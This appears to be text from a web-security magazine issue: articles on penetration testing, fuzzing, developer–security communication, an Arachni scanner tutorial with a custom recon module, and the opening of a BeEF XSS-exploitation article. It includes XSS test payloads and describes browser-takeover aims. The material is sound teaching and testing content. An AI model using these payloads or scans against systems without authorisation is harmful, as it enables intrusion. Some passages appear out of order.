Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, and as they continue to mature, automated security assessment will continue to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools cannot entirely replace manual penetration testing. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, particularly for the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope, and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money, and effort required to assess thousands of web applications will increase the use of automated tools rather than reliance on the human factor to manually test these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases
When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation
All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers, so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts
Proprietary test scripts are not rewritten, even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box
If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution. This is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find the most flaws in the software.
Using hardware test beds
Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you to wherever testing is needed, and are not locked to a physical test lab.
Unprepared for the cloud
A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites
Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use
Most fuzzers are built for security experts, but in QA you cannot expect all testers to understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated
Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
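A mutation fuzzer in miniature shows what automatic test-case creation means: take a valid sample, flip a few bytes, and record crashes. The target parser below is a toy stand-in invented for illustration, not a real protocol implementation:

```python
# Sketch: a minimal mutation fuzzer that creates anomalous test cases
# automatically by flipping bytes in a valid sample. The "parser" under
# test is a toy stand-in target, not a real protocol implementation.
import random

def mutate(sample: bytes, rng: random.Random) -> bytes:
    data = bytearray(sample)
    for _ in range(rng.randint(1, 4)):
        pos = rng.randrange(len(data))
        data[pos] = rng.randrange(256)  # overwrite one byte with a random value
    return bytes(data)

def target_parser(data: bytes) -> int:
    # Toy target: "crashes" (raises) on any NUL byte in the input
    if b"\x00" in data:
        raise ValueError("crash")
    return len(data)

rng = random.Random(1)  # fixed seed so runs are reproducible/documentable
sample = b"GET /index.html HTTP/1.0"
crashes = 0
for _ in range(1000):
    case = mutate(sample, rng)
    try:
        target_parser(case)
    except ValueError:
        crashes += 1  # a real fuzzer would save the crashing test case here
print(crashes)
```

Model-based fuzzers improve on this by mutating fields of a protocol model instead of raw bytes, which is why their coverage per test case is so much higher.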
Test coverage
Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two respects: specification coverage and anomaly coverage.
Scalable
Time is almost always an issue when it comes to testing. The user must also have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing, and therefore need to run tests fast. Sometimes you can spend more time on testing and select other test completion criteria.
Application Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute, and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers something like give us the latest Web 2.0, social-enabled website, or something like that to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more to meet the proposed deadline. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment, when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom. For example, the report might have statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all
Developers are from Venus, Application Security guys are from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
But which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy. There is a third approach I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: using the WAPT activity, instead of an implement a filtering policy statement, you will produce a set of rspec/cucumber scenarios modeling how the source code must deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases, and when testing is complete and all tests pass, it means your source code has implemented the filtering policy. How has development changed? A new approach has been created to ensure that developers implement your remediation statement. Now the developers understand how to handle malformed input, and why it is so important to the Application Security group.
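The BDD loop described above can be shown in miniature. In the article's Rails setting these would be rspec/cucumber scenarios; the same shape in Python, with a hypothetical sanitize() helper and invented malformed-input scenarios, looks like this:

```python
# Sketch of the BDD idea: scenarios model how a (hypothetical) sanitize()
# helper must treat malformed input found during a pen test. Developers
# iterate on the implementation until every scenario passes; in Ruby this
# would be an rspec spec, here plain assertions show the same shape.
import html

def sanitize(value: str) -> str:
    # Candidate implementation under test -- HTML-escape all special chars
    return html.escape(value, quote=True)

# Scenarios derived from concrete pen-test findings,
# not from a vague "implement a filter policy" statement
scenarios = {
    "<script>alert(1)</script>": "&lt;script&gt;alert(1)&lt;/script&gt;",
    '" onmouseover="evil()': "&quot; onmouseover=&quot;evil()",
    "plain text": "plain text",
}

for payload, expected in scenarios.items():
    assert sanitize(payload) == expected
print("all scenarios pass")
```

The scenarios are the shared language: the security tester writes them from the findings, and the developers make them green.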
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem is when the two groups talk to each other at the end of the whole process, using a non-common-ground language that further confuses or annoys everyone and pushes the groups even further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
The security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know in which module, class, or line the problem exists, so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved in two ways:
• Create a development framework that has security built into it
• Design an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added security facilities inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection, and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works when a programming language community provides a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java programming language community, there are a lot of non-standardized frameworks available for Java developers.
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He is interested in code review, and he is working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar, and practicing the Tae kwon-do ITF martial art. He is a husband, a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best combination of tools for the job at hand. Is Arachni worthwhile?
Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view
• A stable, efficient, and high-performance framework: Arachni allows custom modules, reports, and plug-ins, and developers can easily use the advanced framework features without knowing the nitty-gritty details
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1. Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit Card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architectural point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1, and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest Authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler is always run at the start of the scan. This crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies, and headers. It can gracefully handle badly written HTML, thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.
Plug-ins:
• Passive Proxy – Analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in, and/or restricting the scope of the audit
• Form-based AutoLogin – Performs an automated login
• Dictionary attacker – Performs dictionary attacks against HTTP Authentication and form-based authentication
• Profiler – Performs taint analysis with benign inputs and response time analysis
• Cookie collector – Keeps track of cookies while establishing a timeline of the changes
• Healthmap – Generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types – Logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector – Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules – Loads and runs high-level meta-analysis modules pre-, mid-, and post-scan:
  – AutoThrottle – Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  – TimeoutNotice – Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  – Uniformity – Reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need an update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsql3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1 Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually means recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note: these are the same commands as with the Linux installation): Listing 2.
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/local.so.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. In ash, enter:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/local.so.lst
Exit ash
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI, or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and enable you to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, etc.
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, etc.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
• Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
• Tutorial: serves as an example
• Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First, the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
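The include/exclude behaviour described above can be illustrated with a small Python sketch. This is a hypothetical re-implementation using shell-style wildcards via fnmatch rather than Arachni's actual matching code; `select_modules` and the module names are assumptions:

```python
from fnmatch import fnmatch

def select_modules(available, patterns):
    """Select module names: plain patterns include modules,
    a leading '-' excludes them (Arachni-style --mods filter)."""
    includes = [p for p in patterns if not p.startswith('-')] or ['*']
    excludes = [p[1:] for p in patterns if p.startswith('-')]
    return [m for m in available
            if any(fnmatch(m, p) for p in includes)
            and not any(fnmatch(m, p) for p in excludes)]

mods = ['xss', 'xss_event', 'sqli', 'csrf']
print(select_modules(mods, ['*', '-xss*']))  # ['sqli', 'csrf']
```

Exclusions win over inclusions here, which matches the behaviour a tester usually wants: load everything, then carve out the noisy modules.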
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2 Start a Scan screen
Listing 3 Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>
  This is free software; you can copy and distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

# Looks for common files on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited     ||= Set.new
        @@__directories ||= []
        return if !@@__directories.empty?
        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )
        print_status( 'Scanning SVNDigger Dirs...' )
        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }
        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed,
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree and you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; this is where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
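The naming convention above can be sketched in Python. This is purely illustrative; `module_data_dir` is a made-up helper, not part of Arachni:

```python
from pathlib import PurePosixPath

def module_data_dir(module_path: str) -> str:
    """Given a module file, derive the sibling directory the framework
    would search for its external files: same path, extension stripped."""
    return str(PurePosixPath(module_path).with_suffix(''))

print(module_data_dir('modules/recon/svn_digger_dirs.rb'))
# modules/recon/svn_digger_dirs
```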
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about which technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows: Listing 3.
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in further scans) as well as create a report entry for it.
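The check-and-report loop can be sketched in Python as a simplified stand-in: `forced_browse` and the stubbed `exists` check are assumptions for illustration, whereas the real module issues its HTTP requests through Arachni's framework:

```python
def forced_browse(base_url, wordlist, exists):
    """Probe each wordlist directory under base_url; `exists` is a
    callable (in real use, an HTTP HEAD/GET returning True on 200)."""
    found = []
    for dirname in wordlist:
        url = f"{base_url.rstrip('/')}/{dirname}/"
        if exists(url):
            found.append(url)
    return found

wordlist = ['admin', '.svn', 'backup']
# Stub standing in for a real HTTP check against a live server:
fake_server = {'http://www.example.com/.svn/'}
print(forced_browse('http://www.example.com', wordlist, fake_server.__contains__))
# ['http://www.example.com/.svn/']
```

Keeping the existence check pluggable is what makes such a module easy to unit-test without a network.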
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection, with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF, Metasploit Exploitation
Figure 2 BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1 User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
